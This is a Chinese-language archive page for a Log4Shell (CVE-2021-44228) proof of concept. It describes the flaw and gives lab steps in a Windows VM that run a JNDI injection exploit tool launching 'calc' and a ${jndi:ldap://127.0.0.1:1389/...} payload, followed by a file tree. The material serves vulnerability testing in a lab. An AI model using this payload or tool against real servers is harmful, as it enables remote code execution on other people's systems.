关联漏洞
标题:Apache Log4j 代码问题漏洞 (CVE-2021-44228)Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
Log4Shell A test for CVE-2021-44228
介绍
## CVE-2021-44228_Log4Shell
Test source code for Log4Shell(CVE-2021-44228).
### Step Information
1. Install JDK8 (< 8u191) in virtual machine(Windows 10).
2. Copy `out\artifacts\POC_jar\POC.jar` in Windows.
3. Copy `JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar` in Windows, <a href="https://github.com/welk1n/JNDI-Injection-Exploit">Get JNDI-Injection-Exploit</a>
4. Run `java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" -A "127.0.0.1"`
5. Run `java -jar POC.jar ${jndi:ldap://127.0.0.1:1389/*****}`
文件快照
[4.0K] /data/pocs/dbfdc1eed19224a1531c769a74ef491b979e001d
├── [4.0K] out
│ ├── [4.0K] artifacts
│ │ └── [4.0K] POC_jar
│ │ └── [1.9M] POC.jar
│ └── [802K] POC.gif
├── [ 976] pom.xml
├── [ 621] README.md
├── [4.0K] src
│ └── [4.0K] main
│ └── [4.0K] java
│ ├── [4.0K] META-INF
│ │ └── [ 52] MANIFEST.MF
│ └── [4.0K] org
│ └── [4.0K] example
│ └── [ 863] Main.java
└── [4.0K] target
└── [4.0K] classes
└── [4.0K] org
└── [4.0K] example
└── [1.4K] Main.class
13 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。